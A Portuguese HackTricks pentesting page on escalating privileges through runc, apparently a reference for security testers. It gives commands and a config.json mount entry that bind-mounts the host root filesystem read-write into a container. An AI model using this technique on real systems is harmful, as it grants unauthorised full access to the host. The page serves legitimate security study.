hacktricks/linux-hardening/privilege-escalation/runc-privilege-escalation.md
2023-06-06 18:56:34 +00:00

4.6 KiB

Escalação de Privilégios do RunC

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Informações básicas

Se você deseja aprender mais sobre o runc, verifique a seguinte página:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}

PE

Se você descobrir que o runc está instalado no host, poderá executar um contêiner montando a pasta raiz / do host.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

{% hint style="danger" %} Isso nem sempre funcionará, pois a operação padrão do runc é executar como root, portanto, executá-lo como um usuário não privilegiado simplesmente não pode funcionar (a menos que você tenha uma configuração sem raiz). Tornar uma configuração sem raiz o padrão geralmente não é uma boa ideia porque existem várias restrições dentro de contêineres sem raiz que não se aplicam fora deles. {% endhint %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥